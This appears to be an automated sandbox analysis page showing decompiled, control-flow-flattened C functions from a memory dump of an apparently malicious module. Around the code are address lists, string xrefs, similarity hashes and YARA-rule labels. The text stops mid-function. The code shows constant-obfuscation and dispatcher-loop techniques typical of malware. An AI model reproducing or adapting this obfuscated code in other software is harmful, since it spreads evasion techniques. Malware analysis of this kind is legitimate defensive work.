				 *(_t309 + 0x20) =  *(_t309 + 0x20) >> 0xa;
				 *(_t309 + 0x20) =  *(_t309 + 0x20) ^ 0x000d0189;
				 *(_t309 + 0x48) = 0x78d05a;
				 *(_t309 + 0x48) =  *(_t309 + 0x48) + 0xffff831e;
				 *(_t309 + 0x48) =  *(_t309 + 0x48) + 0xebb1;
				 *(_t309 + 0x48) =  *(_t309 + 0x48) ^ 0x0075021b;
				 *(_t309 + 0x1c) = 0xd6fa23;
				 *(_t309 + 0x1c) =  *(_t309 + 0x1c) >> 5;
				 *(_t309 + 0x1c) =  *(_t309 + 0x1c) ^ 0x0008cfad;
				 *(_t309 + 8) = 0xf87e8d;
				 *(_t309 + 8) =  *(_t309 + 8) + 0xfffffe4a;
				 *(_t309 + 8) =  *(_t309 + 8) ^ 0x00f4c4dd;
				 *(_t309 + 0x60) = 0x28bea9;
				 *(_t309 + 0x60) =  *(_t309 + 0x60) + 0x89cb;
				 *(_t309 + 0x60) =  *(_t309 + 0x60) << 9;
				 *(_t309 + 0x60) =  *(_t309 + 0x60) | 0xac1b1a5f;
				 *(_t309 + 0x60) =  *(_t309 + 0x60) ^ 0xfe96ea7a;
				 *(_t309 + 0x3c) = 0x5c6fa7;
				 *(_t309 + 0x3c) =  *(_t309 + 0x3c) + 0xffff9cec;
				 *(_t309 + 0x3c) =  *(_t309 + 0x3c) + 0x3c0a;
				 *(_t309 + 0x3c) =  *(_t309 + 0x3c) ^ 0x005e24c9;
				 *(_t309 + 0x44) = 0x4eeb36;
				 *(_t309 + 0x44) =  *(_t309 + 0x44) + 0xffffa527;
				 *(_t309 + 0x44) =  *(_t309 + 0x44) << 8;
				 *(_t309 + 0x44) =  *(_t309 + 0x44) ^ 0x4e94ccd3;
				 *(_t309 + 0x28) = 0xa0a324;
				 *(_t309 + 0x28) =  *(_t309 + 0x28) + 0xffffde37;
				 *(_t309 + 0x28) =  *(_t309 + 0x28) ^ 0x00a44208;
				 *(_t309 + 0x4c) = 0x2cb21f;
				 *(_t309 + 0x4c) =  *(_t309 + 0x4c) + 0x671c;
				 *(_t309 + 0x4c) =  *(_t309 + 0x4c) << 9;
				 *(_t309 + 0x4c) =  *(_t309 + 0x4c) ^ 0x5a37dc8b;
				 *(_t309 + 0x30) = 0x98f8ae;
				 *(_t309 + 0x30) =  *(_t309 + 0x30) << 8;
				 *(_t309 + 0x30) =  *(_t309 + 0x30) ^ 0x98f43f67;
				 *(_t309 + 0x14) = 0x9a9fba;
				 *(_t309 + 0x14) =  *(_t309 + 0x14) >> 1;
				 *(_t309 + 0x14) =  *(_t309 + 0x14) ^ 0x004fddde;
				 *(_t309 + 0x2c) = 0x7fa50c;
				 *(_t309 + 0x2c) =  *(_t309 + 0x2c) ^ 0x41677625;
				 *(_t309 + 0x2c) =  *(_t309 + 0x2c) ^ 0x4119bbad;
				 *(_t309 + 0xc) = 0x5d623d;
				_t270 = 0x30;
				 *(_t309 + 0xc) =  *(_t309 + 0xc) * 0x34;
				 *(_t309 + 0xc) =  *(_t309 + 0xc) ^ 0x12f405f1;
				 *(_t309 + 0x58) = 0x7c1dcd;
				 *(_t309 + 0x58) =  *(_t309 + 0x58) * 0x51;
				 *(_t309 + 0x58) =  *(_t309 + 0x58) + 0xfffffa28;
				 *(_t309 + 0x58) =  *(_t309 + 0x58) / _t270;
				 *(_t309 + 0x58) =  *(_t309 + 0x58) ^ 0x00d836b3;
				 *(_t309 + 0x10) = 0x299023;
				 *(_t309 + 0x10) =  *(_t309 + 0x10) | 0x8607579c;
				 *(_t309 + 0x10) =  *(_t309 + 0x10) ^ 0x862e0e00;
				goto L1;
				do {
					while(1) {
						L1:
						_t315 = _t274 - 0x7d2acc6;
						if(_t315 > 0) {
							break;
						}
						if(_t315 == 0) {
							_t208 = _t309 - 0x2c; // 0x436010c
							E1000A488(_t304, _t208,  *(_t309 + 0x34),  *(_t309 + 0x6c));
							_t312 = _t312 + 8;
							_t274 = 0x3c5d8ed;
							continue;
						} else {
							if(_t274 == 0x214dbc8) {
								_t274 = 0xb0e99c9;
								 *_t304 =  *_t304 & 0x00000000;
								_t304[1] =  *(_t309 + 0x50);
								continue;
							} else {
								if(_t274 == 0x23b4f3c) {
									_t201 = _t309 - 0x2c; // 0x436010c
									E10011C78( *(_t309 + 0x48),  *((intOrPtr*)(_t307 + 0x10)),  *(_t309 + 0x1c), _t201,  *(_t309 + 8));
									_t312 = _t312 + 0xc;
									_t274 = 0x99e0c8b;
									continue;
								} else {
									if(_t274 == 0x3c5d8ed) {
										_t199 = _t309 - 0x2c; // 0x436010c
										E1001177E(_t307 + 8, _t199, __eflags,  *(_t309 + 0x64),  *(_t309 + 0x24));
										_t274 = 0xd667e74;
										continue;
									} else {
										if(_t274 == 0x777e0ca) {
											_t192 = _t309 - 0x2c; // 0x436010c
											E10011C78( *(_t309 + 0x14),  *((intOrPtr*)(_t307 + 4)),  *(_t309 + 0x2c), _t192,  *(_t309 + 0xc));
											_t312 = _t312 + 0xc;
											_t274 = 0xea9b112;
											continue;
										} else {
											if(_t274 != 0x78efea2) {
												goto L24;
											} else {
												_push(_t274);
												_t264 = E100134E7(_t274, _t304[1]);
												_t312 = _t312 + 0xc;
												 *_t304 = _t264;
												if(_t264 != 0) {
													_t274 = 0x7d2acc6;
													continue;
												}
											}
										}
									}
								}
							}
						}
						L27:
						__eflags =  *_t304;
						_t231 =  *_t304 != 0;
						__eflags = _t231;
						return 0 | _t231;
					}
					__eflags = _t274 - 0x99e0c8b;
					if(_t274 == 0x99e0c8b) {
						_t222 = _t309 - 0x2c; // 0x436010c
						E10011C78( *(_t309 + 0x60),  *((intOrPtr*)(_t307 + 0x50)),  *(_t309 + 0x3c), _t222,  *(_t309 + 0x44));
						_t312 = _t312 + 0xc;
						_t274 = 0xec58463;
						goto L24;
					} else {
						__eflags = _t274 - 0xb0e99c9;
						if(_t274 == 0xb0e99c9) {
							_t304[1] = E1001B278(_t307);
							_t274 = 0x78efea2;
							goto L1;
						} else {
							__eflags = _t274 - 0xd667e74;
							if(_t274 == 0xd667e74) {
								_t216 = _t309 - 0x2c; // 0x436010c
								E10011C78( *(_t309 + 0x18),  *((intOrPtr*)(_t307 + 0x48)),  *(_t309 + 0x68), _t216,  *(_t309 + 0x20));
								_t312 = _t312 + 0xc;
								_t274 = 0x23b4f3c;
								goto L1;
							} else {
								__eflags = _t274 - 0xea9b112;
								if(__eflags == 0) {
									_t229 = _t309 - 0x2c; // 0x436010c
									E1001177E(_t307 + 0x14, _t229, __eflags,  *(_t309 + 0x58),  *(_t309 + 0x10));
								} else {
									__eflags = _t274 - 0xec58463;
									if(_t274 != 0xec58463) {
										goto L24;
									} else {
										_t211 = _t309 - 0x2c; // 0x436010c
										E10011C78( *(_t309 + 0x28),  *((intOrPtr*)(_t307 + 0x38)),  *(_t309 + 0x4c), _t211,  *(_t309 + 0x30));
										_t312 = _t312 + 0xc;
										_t274 = 0x777e0ca;
										goto L1;
									}
								}
							}
						}
					}
					goto L27;
					L24:
					__eflags = _t274 - 0xcf03d8b;
				} while (__eflags != 0);
				goto L27;
			}

0x1001713f
0x1001714b
0x1001714f
0x10017152
0x10017154
0x10017155
0x10017157
0x1001715c
0x10017160
0x10017163
0x1001716c
0x10017173
0x1001717d
0x10017182
0x10017187
0x1001718b
0x1001718f
0x10017196
0x1001719d
0x100171a4
0x100171af
0x100171b0
0x100171b3
0x100171b7
0x100171be
0x100171c5
0x100171cc
0x100171d3
0x100171da
0x100171e1
0x100171e8
0x100171ec
0x100171f3
0x100171fa
0x10017201
0x10017208
0x1001720f
0x10017216
0x1001721d
0x10017221
0x10017228
0x1001722f
0x10017236
0x1001723a
0x10017241
0x10017248
0x1001724f
0x10017256
0x1001725a
0x10017261
0x1001726d
0x10017270
0x10017277
0x1001727e
0x10017289
0x1001728c
0x10017293
0x1001729a
0x100172a1
0x100172a5
0x100172ac
0x100172b3
0x100172ba
0x100172c1
0x100172c8
0x100172cf
0x100172d3
0x100172da
0x100172e1
0x100172ea
0x100172f1
0x100172f8
0x100172ff
0x10017303
0x1001730a
0x10017311
0x10017318
0x1001731f
0x10017326
0x1001732d
0x10017334
0x1001733b
0x1001733f
0x10017346
0x1001734d
0x10017354
0x1001735b
0x10017362
0x10017369
0x1001736d
0x10017374
0x1001737b
0x1001737f
0x10017386
0x1001738d
0x10017390
0x10017397
0x1001739e
0x100173a5
0x100173ac
0x100173b9
0x100173ba
0x100173bd
0x100173c4
0x100173cf
0x100173d2
0x100173e3
0x100173e6
0x100173ed
0x100173f4
0x100173fb
0x100173fb
0x10017402
0x10017402
0x10017402
0x10017402
0x10017404
0x00000000
0x00000000
0x1001740a
0x100174e2
0x100174ea
0x100174ef
0x100174f2
0x00000000
0x10017410
0x10017416
0x100174cf
0x100174d4
0x100174d7
0x00000000
0x1001741c
0x10017422
0x100174ad
0x100174ba
0x100174bf
0x100174c2
0x00000000
0x10017428
0x1001742e
0x10017496
0x10017499
0x100174a0
0x00000000
0x10017430
0x10017436
0x1001746e
0x1001747b
0x10017480
0x10017483
0x00000000
0x10017438
0x1001743e
0x00000000
0x10017444
0x10017450
0x10017455
0x1001745a
0x1001745d
0x10017461
0x10017467
0x00000000
0x10017467
0x10017461
0x1001743e
0x10017436
0x1001742e
0x10017422
0x10017416
0x100175be
0x100175c0
0x100175c4
0x100175c4
0x100175cc
0x100175cc
0x100174fc
0x10017502
0x10017583
0x10017590
0x10017595
0x10017598
0x00000000
0x10017504
0x10017504
0x1001750a
0x10017573
0x10017576
0x00000000
0x1001750c
0x1001750c
0x10017512
0x1001754d
0x1001755a
0x1001755f
0x10017562
0x00000000
0x10017514
0x10017514
0x1001751a
0x100175b4
0x100175b7
0x10017520
0x10017520
0x10017526
0x00000000
0x10017528
0x1001752b
0x10017538
0x1001753d
0x10017540
0x00000000
0x10017540
0x10017526
0x1001751a
0x10017512
0x1001750a
0x00000000
0x1001759d
0x1001759d
0x1001759d
0x00000000

Strings

=b], xrefs: 100173AC
t~f, xrefs: 100174A0
t~f, xrefs: 1001750C
WNx, xrefs: 1001724F
WO , xrefs: 1001722F
6N, xrefs: 1001732D
%vgA, xrefs: 1001739E

Memory Dump Source

Source File: 00000000.00000002.360520521.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Similarity

API ID:
String ID: %vgA$6N$=b]$WNx$WO $t~f$t~f
API String ID: 0-256306261
Opcode ID: 15888997ce855d06b148dc0fcaa63aeca01e0cdf758efd4855d66f1f16f5c102
Instruction ID: d0e21da2910045ef79a979f1cf8ae369cdf8e9cb65ae3d14651a5ae528a70e12
Opcode Fuzzy Hash: 15888997ce855d06b148dc0fcaa63aeca01e0cdf758efd4855d66f1f16f5c102
Instruction Fuzzy Hash: 5AC113B55003499BCF69CF65C88A8DE3BB1FB44358F108119FE1A9A260D7B5D999CF80

Uniqueness

Uniqueness Score: -1.00%

Function 1001C47E, Relevance: 9.0, Strings: 7, Instructions: 240
COMMONCrypto

Download Yara Rule

C-Code - Quality: 99%

			E1001C47E() {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				intOrPtr _t247;
				signed int _t248;
				intOrPtr _t251;
				void* _t252;
				signed int _t254;
				signed int _t255;
				signed int _t256;
				void* _t278;
				char _t282;
				signed int* _t283;
				void* _t286;

				_t283 =  &_v124;
				_v108 = 0xaa9c69;
				_v108 = _v108 >> 8;
				_v108 = _v108 ^ 0x9c15c768;
				_v108 = _v108 ^ 0x5e859b35;
				_v108 = _v108 ^ 0xc2968236;
				_v64 = 0x7f4099;
				_v64 = _v64 * 0x73;
				_t252 = 0;
				_v64 = _v64 | 0xa3168533;
				_t278 = 0x4c4cf45;
				_v64 = _v64 ^ 0xbb3619cf;
				_v68 = 0xa60223;
				_v68 = _v68 + 0x9657;
				_v68 = _v68 ^ 0xd006cbe2;
				_v68 = _v68 ^ 0xd0ab0bbe;
				_v112 = 0xee2718;
				_v112 = _v112 << 0xa;
				_v112 = _v112 ^ 0xc59ab444;
				_v112 = _v112 ^ 0x64405192;
				_v112 = _v112 ^ 0x194455aa;
				_v116 = 0x4ec6b9;
				_t254 = 0x1f;
				_v116 = _v116 / _t254;
				_v116 = _v116 >> 2;
				_v116 = _v116 + 0xffffdc46;
				_v116 = _v116 ^ 0x0000a732;
				_v36 = 0x4d0333;
				_v36 = _v36 ^ 0x28b10f9e;
				_v36 = _v36 ^ 0x28fdf232;
				_v84 = 0x44294d;
				_v84 = _v84 + 0xae36;
				_v84 = _v84 + 0xffffd2b5;
				_v84 = _v84 ^ 0x004b614a;
				_v124 = 0x993cd2;
				_t255 = 0x6f;
				_v124 = _v124 * 0x1d;
				_v124 = _v124 + 0xffffaf9f;
				_v124 = _v124 << 0xb;
				_v124 = _v124 ^ 0xdc929e0e;
				_v88 = 0x91da58;
				_v88 = _v88 << 0xb;
				_v88 = _v88 + 0xffffbc04;
				_v88 = _v88 ^ 0x8ed38fd3;
				_v92 = 0x3f7556;
				_v92 = _v92 >> 8;
				_v92 = _v92 ^ 0x3a807a95;
				_v92 = _v92 ^ 0x3a899497;
				_v72 = 0xbd1a6;
				_v72 = _v72 | 0x3bea8884;
				_v72 = _v72 * 0x66;
				_v72 = _v72 ^ 0xdff9aff3;
				_v40 = 0xc55647;
				_v40 = _v40 + 0x3562;
				_v40 = _v40 ^ 0x00c4431d;
				_v76 = 0x8edfc2;
				_v76 = _v76 | 0x4a1ff07c;
				_v76 = _v76 + 0x4026;
				_v76 = _v76 ^ 0x4aa14dbd;
				_v56 = 0xbf3ff1;
				_v56 = _v56 ^ 0x2fd84af2;
				_v56 = _v56 / _t255;
				_v56 = _v56 ^ 0x0061d2b2;
				_v60 = 0x78af52;
				_v60 = _v60 + 0xb9;
				_v60 = _v60 | 0x6199b5ad;
				_v60 = _v60 ^ 0x61f0c099;
				_v104 = 0xba4796;
				_v104 = _v104 | 0x9c2bbd5f;
				_v104 = _v104 ^ 0x7fbf6531;
				_v104 = _v104 + 0xffff642d;
				_v104 = _v104 ^ 0xe306bfef;
				_v44 = 0x3b3ab1;
				_t256 = 0x22;
				_v44 = _v44 / _t256;
				_v44 = _v44 ^ 0x0003ce20;
				_v80 = 0x136bc0;
				_v80 = _v80 ^ 0x8f1facec;
				_v80 = _v80 ^ 0x5dff775a;
				_v80 = _v80 ^ 0xd2fee0f2;
				_v48 = 0x663ed4;
				_v48 = _v48 + 0xffffa6ed;
				_v48 = _v48 ^ 0x0065523d;
				_v120 = 0x6cdec9;
				_v120 = _v120 ^ 0xd177157d;
				_v120 = _v120 * 0x54;
				_v120 = _v120 << 1;
				_v120 = _v120 ^ 0x3a3e9cd3;
				_v52 = 0x5d74d3;
				_v52 = _v52 + 0x4ec7;
				_v52 = _v52 << 2;
				_v52 = _v52 ^ 0x01759cc3;
				_v32 = 0x4d0605;
				_v32 = _v32 + 0xffff4297;
				_v32 = _v32 ^ 0x004ca3be;
				_v96 = 0x8c7be5;
				_v96 = _v96 * 0x59;
				_v96 = _v96 + 0x752f;
				_v96 = _v96 * 0x26;
				_v96 = _v96 ^ 0x3ff2189c;
				_v100 = 0x9bfcaf;
				_v100 = _v100 + 0xe56c;
				_v100 = _v100 + 0x15aa;
				_v100 = _v100 + 0xffff3656;
				_v100 = _v100 ^ 0x00948c22;
				_t277 = _v28;
				_t282 = _v28;
				goto L1;
				do {
					while(1) {
						L1:
						_t286 = _t278 - 0xb0757fc;
						if(_t286 > 0) {
							break;
						}
						if(_t286 == 0) {
							_t247 = E1000A0FC( &_v28, _t282, _v68, _v112, _v116, _v36);
							_t277 = _t247;
							_t283 =  &(_t283[4]);
							if(_t247 == 0) {
								L23:
								return _t252;
							}
							_t278 = 0x85110e3;
							continue;
						}
						if(_t278 == 0x3b9ae13) {
							_t248 = E100060E8( &_v24,  &_v16, _v72, _v40, _v76);
							_t283 =  &(_t283[3]);
							asm("sbb esi, esi");
							_t278 = ( ~_t248 & 0x05144090) + 0x63f0c3f;
							continue;
						}
						if(_t278 == 0x4c4cf45) {
							_t278 = 0xc2e4c9a;
							continue;
						}
						if(_t278 == 0x63f0c3f) {
							E100088FC(_v44, _v80, _v48, _v120, _v24);
							_t283 =  &(_t283[3]);
							_t278 = 0xb735e7e;
							continue;
						}
						if(_t278 != 0x85110e3) {
							goto L20;
						} else {
							_t278 = 0xb735e7e;
							if(_v28 > 2) {
								_t251 = E1001A288(_v84, _v124, _v88, _v92,  &_v20,  *((intOrPtr*)(_t277 + 8)));
								_t283 =  &(_t283[4]);
								_v24 = _t251;
								if(_t251 != 0) {
									_t278 = 0x3b9ae13;
								}
							}
							continue;
						}
					}
					if(_t278 == 0xb534ccf) {
						E1001683E( *0x10025208 + 0x1c, _v56, _v8 + 1, _v60, _v104, _v12);
						_t283 =  &(_t283[4]);
						_t252 = 1;
						_t278 = 0x63f0c3f;
						 *((intOrPtr*)( *0x10025208 + 4)) = _v16;
						goto L20;
					}
					if(_t278 == 0xb735e7e) {
						E1001E9AB(_v52, _v32, _v96, _t277, _v100);
						goto L23;
					}
					if(_t278 != 0xc2e4c9a) {
						goto L20;
					}
					_t282 = E10006064();
					_t278 = 0xb0757fc;
					goto L1;
					L20:
				} while (_t278 != 0x3c4971f);
				goto L23;
			}

0x1001c47e
0x1001c481
0x1001c48b
0x1001c490
0x1001c498
0x1001c4a0
0x1001c4a8
0x1001c4b9
0x1001c4bd
0x1001c4bf
0x1001c4c7
0x1001c4cc
0x1001c4d4
0x1001c4dc
0x1001c4e4
0x1001c4ec
0x1001c4f4
0x1001c4fc
0x1001c501
0x1001c509
0x1001c511
0x1001c519
0x1001c527
0x1001c52c
0x1001c532
0x1001c537
0x1001c53f
0x1001c547
0x1001c54f
0x1001c557
0x1001c55f
0x1001c567
0x1001c56f
0x1001c577
0x1001c57f
0x1001c58c
0x1001c58d
0x1001c591
0x1001c599
0x1001c59e
0x1001c5a6
0x1001c5ae
0x1001c5b3
0x1001c5bb
0x1001c5c3
0x1001c5cb
0x1001c5d0
0x1001c5d8
0x1001c5e0
0x1001c5e8
0x1001c5f5
0x1001c5f9
0x1001c601
0x1001c609
0x1001c611
0x1001c619
0x1001c621
0x1001c629
0x1001c631
0x1001c639
0x1001c641
0x1001c64f
0x1001c653
0x1001c65b
0x1001c663
0x1001c66b
0x1001c673
0x1001c67b
0x1001c685
0x1001c68d
0x1001c695
0x1001c69d
0x1001c6a5
0x1001c6b3
0x1001c6b6
0x1001c6ba
0x1001c6c2
0x1001c6ca
0x1001c6d2
0x1001c6da
0x1001c6e2
0x1001c6ea
0x1001c6f2
0x1001c6fa
0x1001c702
0x1001c70f
0x1001c713
0x1001c717
0x1001c71f
0x1001c727
0x1001c72f
0x1001c734
0x1001c73c
0x1001c744
0x1001c74c
0x1001c754
0x1001c761
0x1001c765
0x1001c772
0x1001c776
0x1001c77e
0x1001c786
0x1001c78e
0x1001c796
0x1001c79e
0x1001c7a6
0x1001c7aa
0x1001c7aa
0x1001c7ae
0x1001c7ae
0x1001c7ae
0x1001c7ae
0x1001c7b4
0x00000000
0x00000000
0x1001c7ba
0x1001c89f
0x1001c8a4
0x1001c8a6
0x1001c8ab
0x1001c95b
0x1001c961
0x1001c961
0x1001c8b1
0x00000000
0x1001c8b1
0x1001c7c6
0x1001c86a
0x1001c86f
0x1001c876
0x1001c87e
0x00000000
0x1001c87e
0x1001c7d2
0x1001c849
0x00000000
0x1001c849
0x1001c7da
0x1001c837
0x1001c83c
0x1001c83f
0x00000000
0x1001c83f
0x1001c7e2
0x00000000
0x1001c7e8
0x1001c7ed
0x1001c7f2
0x1001c80c
0x1001c811
0x1001c814
0x1001c81a
0x1001c81c
0x1001c81c
0x1001c81a
0x00000000
0x1001c7f2
0x1001c7e2
0x1001c8c1
0x1001c911
0x1001c925
0x1001c928
0x1001c929
0x1001c92e
0x00000000
0x1001c92e
0x1001c8c9
0x1001c950
0x00000000
0x1001c955
0x1001c8d1
0x00000000
0x00000000
0x1001c8e0
0x1001c8e2
0x00000000
0x1001c931
0x1001c931
0x00000000

Strings

&@, xrefs: 1001C629
=Re, xrefs: 1001C6F2
l, xrefs: 1001C786
Vu?, xrefs: 1001C5C3
JaK, xrefs: 1001C577
b5, xrefs: 1001C609
/u, xrefs: 1001C765

Memory Dump Source

Source File: 00000000.00000002.360520521.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Similarity

API ID:
String ID: &@$/u$=Re$JaK$Vu?$b5$l
API String ID: 0-3965836545
Opcode ID: 75ce436d130786633be87d8a7f29f492511ee553bb8607557e6c4ec8aca4db0c
Instruction ID: 94f6111f820b4815b791df5c1271dcad70c39f3d0ba5a4f48c2f8e61aa165e00
Opcode Fuzzy Hash: 75ce436d130786633be87d8a7f29f492511ee553bb8607557e6c4ec8aca4db0c
Instruction Fuzzy Hash: 99C11F728083819FD394CF65C58580BFBE1FB84758F10892DF6A59A260D3B5C959CF86

Uniqueness

Uniqueness Score: -1.00%

Function 1000ADD9, Relevance: 7.9, Strings: 6, Instructions: 401
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E1000ADD9() {
				void* _t429;
				intOrPtr _t432;
				signed int _t437;
				signed int _t438;
				signed int _t440;
				signed int _t441;
				intOrPtr _t452;
				signed int _t454;
				void* _t457;
				signed int _t503;
				signed int _t504;
				signed int _t507;
				signed int _t508;
				signed int _t509;
				signed int _t510;
				signed int _t511;
				signed int _t512;
				signed int _t513;
				signed int _t514;
				signed int _t515;
				signed int _t516;
				signed int _t518;
				void* _t522;

				 *((intOrPtr*)(_t522 + 0xa8)) = 0xa75ba0;
				 *(_t522 + 0xb0) = 0;
				 *(_t522 + 0xac) = 0xe89f8c;
				_t457 = 0xe349031;
				 *(_t522 + 0x84) = 0x7bd0b2;
				 *(_t522 + 0xb0) = 0;
				_t507 = 0x14;
				 *(_t522 + 0x94) =  *(_t522 + 0x90) / _t507;
				 *(_t522 + 0x94) =  *(_t522 + 0x94) ^ 0x000630d4;
				 *(_t522 + 0x28) = 0xe79ed8;
				 *(_t522 + 0x28) =  *(_t522 + 0x28) + 0xed53;
				 *(_t522 + 0x28) =  *(_t522 + 0x28) << 0xe;
				_t503 = 0x61;
				 *(_t522 + 0x28) =  *(_t522 + 0x28) / _t503;
				 *(_t522 + 0x28) =  *(_t522 + 0x28) ^ 0x005c7b60;
				 *(_t522 + 0xa4) = 0xfe7e5f;
				 *(_t522 + 0xa4) =  *(_t522 + 0xa4) | 0x74bc0af0;
				 *(_t522 + 0xa4) =  *(_t522 + 0xa4) ^ 0x74fe7efc;
				 *(_t522 + 0x90) = 0x37fd1f;
				_t508 = 0x31;
				_t454 = 0x5e;
				 *(_t522 + 0x90) =  *(_t522 + 0x90) * 0xf;
				 *(_t522 + 0x90) =  *(_t522 + 0x90) ^ 0x034c144f;
				 *(_t522 + 0x88) = 0x9efb4a;
				 *(_t522 + 0x88) =  *(_t522 + 0x88) / _t508;
				 *(_t522 + 0x88) =  *(_t522 + 0x88) ^ 0x0000d09f;
				 *(_t522 + 0x34) = 0xd5d81d;
				 *(_t522 + 0x34) =  *(_t522 + 0x34) + 0x110e;
				 *(_t522 + 0x34) =  *(_t522 + 0x34) + 0xffff9e5c;
				 *(_t522 + 0x34) =  *(_t522 + 0x34) + 0x6c5;
				 *(_t522 + 0x34) =  *(_t522 + 0x34) ^ 0x00d84070;
				 *(_t522 + 0x68) = 0x69b95f;
				 *(_t522 + 0x68) =  *(_t522 + 0x68) / _t454;
				 *(_t522 + 0x68) =  *(_t522 + 0x68) + 0xffffd11a;
				 *(_t522 + 0x68) =  *(_t522 + 0x68) ^ 0x000cdce4;
				 *(_t522 + 0x80) = 0x2ff249;
				 *(_t522 + 0x80) =  *(_t522 + 0x80) ^ 0x2963f326;
				 *(_t522 + 0x80) =  *(_t522 + 0x80) ^ 0x294b3653;
				 *(_t522 + 0x64) = 0xd0d1b6;
				 *(_t522 + 0x64) =  *(_t522 + 0x64) ^ 0x92c14920;
				 *(_t522 + 0x64) =  *(_t522 + 0x64) + 0xffff6daa;
				 *(_t522 + 0x64) =  *(_t522 + 0x64) ^ 0x921039df;
				 *(_t522 + 0x48) = 0x35cd13;
				 *(_t522 + 0x48) =  *(_t522 + 0x48) | 0x7d813850;
				 *(_t522 + 0x48) =  *(_t522 + 0x48) >> 0xe;
				 *(_t522 + 0x48) =  *(_t522 + 0x48) ^ 0x000a1d32;
				 *(_t522 + 0x38) = 0x5471d;
				 *(_t522 + 0x38) =  *(_t522 + 0x38) / _t454;
				 *(_t522 + 0x38) =  *(_t522 + 0x38) * 0x56;
				 *(_t522 + 0x38) =  *(_t522 + 0x38) + 0x3fc2;
				 *(_t522 + 0x38) =  *(_t522 + 0x38) ^ 0x0006a753;
				 *(_t522 + 0x4c) = 0xa8af7;
				 *(_t522 + 0x4c) =  *(_t522 + 0x4c) | 0xca787d1a;
				 *(_t522 + 0x4c) =  *(_t522 + 0x4c) >> 4;
				 *(_t522 + 0x4c) =  *(_t522 + 0x4c) ^ 0x0ca9585e;
				 *(_t522 + 0x18) = 0xebf803;
				_t509 = 0x38;
				 *(_t522 + 0x1c) =  *(_t522 + 0x18) * 0x13;
				 *(_t522 + 0x1c) =  *(_t522 + 0x1c) | 0x52f835bd;
				 *(_t522 + 0x1c) =  *(_t522 + 0x1c) + 0x7cae;
				 *(_t522 + 0x1c) =  *(_t522 + 0x1c) ^ 0x53f09f0d;
				 *(_t522 + 0x5c) = 0x41c18d;
				 *(_t522 + 0x5c) =  *(_t522 + 0x5c) / _t503;
				 *(_t522 + 0x5c) =  *(_t522 + 0x5c) ^ 0xfba76696;
				 *(_t522 + 0x5c) =  *(_t522 + 0x5c) ^ 0xfba03c3f;
				 *(_t522 + 0x70) = 0x5e17b8;
				 *(_t522 + 0x70) =  *(_t522 + 0x70) << 0xa;
				 *(_t522 + 0x70) =  *(_t522 + 0x70) | 0xd966aecd;
				 *(_t522 + 0x70) =  *(_t522 + 0x70) ^ 0xf97613ad;
				 *(_t522 + 0x60) = 0xf0bb0a;
				 *(_t522 + 0x60) =  *(_t522 + 0x60) ^ 0xb9dedd33;
				 *(_t522 + 0x60) =  *(_t522 + 0x60) << 9;
				 *(_t522 + 0x60) =  *(_t522 + 0x60) ^ 0x5cc7c01b;
				 *(_t522 + 0x90) = 0x92b158;
				 *(_t522 + 0x90) =  *(_t522 + 0x90) << 2;
				 *(_t522 + 0x90) =  *(_t522 + 0x90) ^ 0x024e6319;
				 *(_t522 + 0x34) = 0xd202d4;
				 *(_t522 + 0x34) =  *(_t522 + 0x34) + 0xfffff5b5;
				 *(_t522 + 0x34) =  *(_t522 + 0x34) << 2;
				 *(_t522 + 0x34) =  *(_t522 + 0x34) + 0x2eff;
				 *(_t522 + 0x34) =  *(_t522 + 0x34) ^ 0x03432dd5;
				 *(_t522 + 0x14) = 0x1f50ce;
				 *(_t522 + 0x14) =  *(_t522 + 0x14) + 0x400e;
				 *(_t522 + 0x14) =  *(_t522 + 0x14) | 0x10c12557;
				 *(_t522 + 0x14) =  *(_t522 + 0x14) ^ 0xcfbb6dec;
				 *(_t522 + 0x14) =  *(_t522 + 0x14) ^ 0xdf63cdf0;
				 *(_t522 + 0xa0) = 0xaa343a;
				 *(_t522 + 0xa0) =  *(_t522 + 0xa0) + 0xffffb3c4;
				 *(_t522 + 0xa0) =  *(_t522 + 0xa0) ^ 0x00ae4e18;
				 *(_t522 + 0x44) = 0xb5e83;
				 *(_t522 + 0x44) =  *(_t522 + 0x44) | 0xbf5fd7ef;
				 *(_t522 + 0x44) =  *(_t522 + 0x44) ^ 0xbf57449e;
				 *(_t522 + 0xa4) = 0x406b6d;
				 *(_t522 + 0xa4) =  *(_t522 + 0xa4) * 0x22;
				 *(_t522 + 0xa4) =  *(_t522 + 0xa4) ^ 0x08875be6;
				 *(_t522 + 0x54) = 0xfa9973;
				 *(_t522 + 0x54) =  *(_t522 + 0x54) + 0xb062;
				 *(_t522 + 0x54) =  *(_t522 + 0x54) / _t509;
				 *(_t522 + 0x54) =  *(_t522 + 0x54) ^ 0x000e9325;
				 *(_t522 + 0x48) = 0xb2b252;
				 *(_t522 + 0x48) =  *(_t522 + 0x48) + 0xfffff4a2;
				 *(_t522 + 0x48) =  *(_t522 + 0x48) >> 5;
				 *(_t522 + 0x48) =  *(_t522 + 0x48) ^ 0x00020155;
				 *(_t522 + 0xb0) = 0x588d92;
				 *(_t522 + 0xb0) =  *(_t522 + 0xb0) << 7;
				 *(_t522 + 0xb0) =  *(_t522 + 0xb0) ^ 0x2c44a65b;
				 *(_t522 + 0xac) = 0x40b44d;
				 *(_t522 + 0xac) =  *(_t522 + 0xac) << 2;
				 *(_t522 + 0xac) =  *(_t522 + 0xac) ^ 0x0106510c;
				 *(_t522 + 0x18) = 0x654d2b;
				 *(_t522 + 0x18) =  *(_t522 + 0x18) >> 0xb;
				_t510 = 0x1d;
				 *(_t522 + 0x14) =  *(_t522 + 0x18) / _t510;
				 *(_t522 + 0x14) =  *(_t522 + 0x14) ^ 0xb429ce3b;
				 *(_t522 + 0x14) =  *(_t522 + 0x14) ^ 0xb4263a5b;
				 *(_t522 + 0x60) = 0xd0958b;
				 *(_t522 + 0x60) =  *(_t522 + 0x60) << 7;
